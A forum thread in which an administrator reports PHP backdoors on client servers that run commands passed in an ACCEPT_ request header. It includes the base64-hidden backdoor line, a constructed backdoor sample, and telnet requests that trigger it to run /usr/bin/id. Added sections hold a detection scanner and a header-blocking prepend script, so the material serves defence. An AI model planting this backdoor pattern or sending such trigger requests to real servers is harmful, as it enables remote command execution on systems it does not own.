jeev Posted November 12, 2007

So I do freelance administration. I really don't know much about coding in PHP, but I can figure some out. I've set up monitoring scripts on all 200 servers, and they're a pretty big adult company. They have an in-house programmer; he's good, but some things just keep getting through. This is the second time. The first 100 times I found r57 shell and stuff like that on the servers. Now I'm finding these:

    $verify_member = getenv(base64_decode("SFRUUF9BQ0NFUFRfU0lMVkVSVEVBTQ=="));

I guess that pretty much comes out to ACCEPT_SILVERTEAM, and I've tested it. You can force a lot of things with that. Example:

    $ telnet www.x 80
    Trying x...
    Connected to x.
    Escape character is '^]'.
    GET /treepad/pics/temp/lol.php HTTP/1.1
    Host: www.x
    ACCEPT_xfiles: /usr/bin/id

    HTTP/1.1 200 OK
    Date: Sun, 22 Jul 2007 06:29:15 GMT
    Server: Apache/2.0.54 (Fedora)
    X-Powered-By: PHP/5.0.4
    Content-Length: 62
    Connection: close
    Content-Type: text/html

    uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)

That was the first script; the second one was pretty much the same. You can pass, have it download, blah blah, more backdoors. How do I prevent this, other than good coding?

a) I don't think they use base64_decode, so I'd like to disallow that, I think. I can pass that in php.ini, I recall. But how do I stop "ACCEPT_" type commands?

Thanks in advance.
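The backdoor above has two halves: a request header read through getenv() or $_SERVER (with the HTTP_ name hidden behind base64_decode), and a command-execution call that runs whatever the header carried. The scanner below, an added example and not code from the thread, looks for both halves in PHP source so it can be run over the document roots of many servers. It decodes every base64-looking string literal and reports any that decode to an HTTP_* name, reports clear-text reads of non-standard headers, and lists the execution primitives present. The file paths, the embedded sample sources and the "php scan_header_backdoors.php /var/www" invocation are assumptions for the example; it needs PHP 7 or later on the host running the scan.

```php
<?php
// Added example (not from the thread): find header-triggered backdoors in PHP source.
// Usage (assumed): php scan_header_backdoors.php /var/www
// With no argument it scans two constructed samples embedded below.

// Request headers that ordinary application code reads; these are not reported
// when they appear in the clear (a base64-hidden name is always reported).
const COMMON_HEADERS = array('HTTP_HOST', 'HTTP_USER_AGENT', 'HTTP_REFERER', 'HTTP_ACCEPT',
    'HTTP_ACCEPT_ENCODING', 'HTTP_ACCEPT_LANGUAGE', 'HTTP_ACCEPT_CHARSET', 'HTTP_COOKIE',
    'HTTP_X_FORWARDED_FOR', 'HTTP_AUTHORIZATION', 'HTTP_X_REQUESTED_WITH');

// Base64-looking string literals in the source, mapped to their decoded text.
// Strict decoding; non-printable results (images, compressed data) are dropped.
function decodeBase64Literals(string $src): array
{
    preg_match_all('/[\'"]([A-Za-z0-9+\/]{12,}={0,2})[\'"]/', $src, $m);
    $out = array();
    foreach ($m[1] as $lit) {
        $dec = base64_decode($lit, true);
        if ($dec !== false && $dec !== '' && ctype_print($dec)) {
            $out[$lit] = $dec;
        }
    }
    return $out;
}

// Analyse one file's contents. Returns the headers it reads, the execution
// primitives it calls, and a verdict: hidden header name, or header read + exec.
function findHeaderBackdoorIndicators(string $src): array
{
    $headers = array();
    $hidden = false;
    foreach (decodeBase64Literals($src) as $lit => $dec) {
        if (preg_match('/^HTTP_[A-Z0-9_]+$/', $dec)) {
            $headers[] = $dec . ' (hidden as base64 "' . $lit . '")';
            $hidden = true;
        }
    }
    if (preg_match_all('/(?:getenv\s*\(\s*|\$_SERVER\s*\[\s*)[\'"](HTTP_[A-Z0-9_]+)[\'"]/', $src, $m)) {
        foreach (array_unique($m[1]) as $h) {
            if (!in_array($h, COMMON_HEADERS, true)) {
                $headers[] = $h;
            }
        }
    }
    $execs = array();
    foreach (array('system', 'exec', 'shell_exec', 'passthru', 'popen', 'proc_open', 'eval') as $fn) {
        if (preg_match('/\b' . $fn . '\s*\(/', $src)) {
            $execs[] = $fn;
        }
    }
    if (preg_match('/`[^`]*\$[^`]*`/', $src)) {
        $execs[] = 'backticks';   // `...` is shell_exec in disguise
    }
    return array(
        'headers'    => $headers,
        'exec'       => $execs,
        'suspicious' => $hidden || (count($headers) > 0 && count($execs) > 0),
    );
}

// Walk a directory tree and report suspicious .php files.
function scanDirectory(string $dir): array
{
    $report = array();
    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $r = findHeaderBackdoorIndicators((string) file_get_contents($file->getPathname()));
        if ($r['suspicious']) {
            $report[$file->getPathname()] = $r;
        }
    }
    return $report;
}

if (PHP_SAPI === 'cli') {
    if (isset($argv[1])) {
        foreach (scanDirectory($argv[1]) as $path => $r) {
            echo $path, ': reads ', implode(', ', $r['headers']), '; calls ', implode(', ', $r['exec']), "\n";
        }
    } else {
        // Constructed samples: a backdoor shaped like the one in the thread, and a benign file.
        $samples = array(
            'backdoor.php' => '<?php $verify_member = getenv(base64_decode("SFRUUF9BQ0NFUFRfU0lMVkVSVEVBTQ==")); if ($verify_member) { echo shell_exec($verify_member); exit; }',
            'benign.php'   => '<?php $ua = $_SERVER["HTTP_USER_AGENT"]; $png = base64_decode("iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJ"); echo strlen($png);',
        );
        foreach ($samples as $name => $src) {
            $r = findHeaderBackdoorIndicators($src);
            echo $name, ': ', $r['suspicious'] ? 'SUSPICIOUS' : 'clean', "\n";
        }
    }
}
```

Run without arguments it prints backdoor.php as SUSPICIOUS (the literal decodes to HTTP_ACCEPT_SILVERTEAM and shell_exec is present) and benign.php as clean (the base64 there is binary image data and the only header read is User-Agent). A match is a lead for a human to read the file, not a verdict; the point of reporting both halves is that a custom header read next to an exec call is exactly the shape of the sample in the post above.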
trq Posted November 12, 2007

I'm not sure I understand this well enough to help much, but you could quite easily create a script that searches the $_REQUEST array looking to see if it holds an ACCEPT_* key.

    <?php
    // Stop the request if any GET/POST/cookie parameter name starts with ACCEPT_
    foreach ($_REQUEST as $key => $value) {
        if (substr($key, 0, 7) == 'ACCEPT_') {
            die();
        }
    }
    ?>

I'm really not sure this will help, but it may be a start.
jeev Posted November 12, 2007

Thank you so much, but I wouldn't even know where to begin with what you gave me. I really do not understand it. I just would like to know how I could prevent ACCEPT_ from being passed and accepted in PHP. But the first thing I'm going to do is deny base64_decode.
trq Posted November 12, 2007

Well, providing I'm on the right track, the easiest approach would be to place the snippet I provided in a file /usr/local/deny_accept.php and then add the line

    auto_prepend_file "/usr/local/deny_accept.php"

to your php.ini. Like I said, I'm not 100% sure this would work, but it may be worth at least showing your programmer my idea.
jeev Posted November 12, 2007

Ahh, wow. I will try it tomorrow morning and let you know. Thank you so much.
jeev Posted November 12, 2007

:/ I tried it and it still goes. I had verified auto_prepend_file was working properly; permissions were wrong initially, but they load now. It doesn't stop it:

    Escape character is '^]'.
    GET /members/j.php HTTP/1.1
    Host: x
    ACCEPT_SILVERTEAM: /usr/bin/id

    HTTP/1.1 200 OK
    Date: Mon, 12 Nov 2007 17:09:40 GMT
    Server: Apache/1.3.37 (Unix) PHP/4.4.7
    X-Powered-By: PHP/4.4.7
    Transfer-Encoding: chunked
    Content-Type: text/html

    27
    uid=80(www) gid=80(www) groups=80(www)
    0
jeev Posted November 12, 2007

    <?php
    // Look at the raw request headers and stop before the page runs if any name starts with ACCEPT_
    $headers = apache_request_headers();
    foreach ($headers as $key => $value) {
        if (strtoupper(substr($key, 0, 7)) === 'ACCEPT_') {
            die();
        }
    }
    ?>

That worked! Also, disable_functions = shell_exec and base64_decode. We don't use base64_decode, so I put that for now, and I'm leaving the prepend out till I can make sure it doesn't break the whole environment. It's over 150 servers, so base64_decode is fine for now because it is not used anywhere else.
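A variant of that prepend script, added here as an example and not code from the thread, that checks the header names PHP actually exposes rather than the raw spelling on the wire. The web server uppercases each request header name and replaces '-' with '_' before PHP sees it as $_SERVER['HTTP_...'], so "ACCEPT_SILVERTEAM:", "Accept-SilverTeam:" and "accept_silverteam:" all arrive as HTTP_ACCEPT_SILVERTEAM and all reach getenv() in the backdoor. Matching on the normalized name catches every spelling; the standard Accept, Accept-Encoding, Accept-Language and Accept-Charset headers are allowed through by name so browsers are unaffected. The file path is the one from the thread; the log message format is an assumption. It is written for PHP 4.4 and 5.0 as on the servers above (no short arrays, no type hints).

```php
<?php
// Added example, not the thread's own code. Install as /usr/local/deny_accept.php and set
//   auto_prepend_file = "/usr/local/deny_accept.php"
// in php.ini. Runs before every script; rejects requests carrying a non-standard
// header that PHP would expose as HTTP_ACCEPT_*.

// Normalized request header names (HTTP_ prefix removed) that real clients send
// under the ACCEPT_ prefix. Anything else under that prefix is rejected.
$DENY_ACCEPT_ALLOWED = array('ACCEPT', 'ACCEPT_ENCODING', 'ACCEPT_LANGUAGE', 'ACCEPT_CHARSET');

// Returns the normalized name of the first blocked header in $server, or false.
// $server is normally $_SERVER; passing it in keeps the function testable.
function deny_accept_find_blocked($server, $prefixes, $allowed)
{
    foreach ($server as $key => $value) {
        if (substr($key, 0, 5) !== 'HTTP_') {
            continue;                       // not a request header
        }
        $name = substr($key, 5);            // e.g. ACCEPT_SILVERTEAM, ACCEPT_ENCODING
        if (in_array($name, $allowed, true)) {
            continue;                       // legitimate Accept-* header
        }
        foreach ($prefixes as $p) {
            if (substr($name, 0, strlen($p)) === $p) {
                return $name;
            }
        }
    }
    return false;
}

$blocked = deny_accept_find_blocked($_SERVER, array('ACCEPT_'), $DENY_ACCEPT_ALLOWED);
if ($blocked !== false) {
    $from = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '?';
    $uri  = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '?';
    // Written to the Apache error log: the URI tells you which file the backdoor lives in.
    error_log('deny_accept: blocked header HTTP_' . $blocked . ' from ' . $from . ' for ' . $uri);
    header('HTTP/1.0 403 Forbidden');
    exit;
}
```

The log line is the useful part for cleanup: every blocked request names the script the attacker was calling, which is the file to pull and compare against the scanner findings. The prepend only stops the header-triggered family seen so far; the backdoor files still need to be removed, and the blocked prefix list can be extended as new variants turn up in the logs.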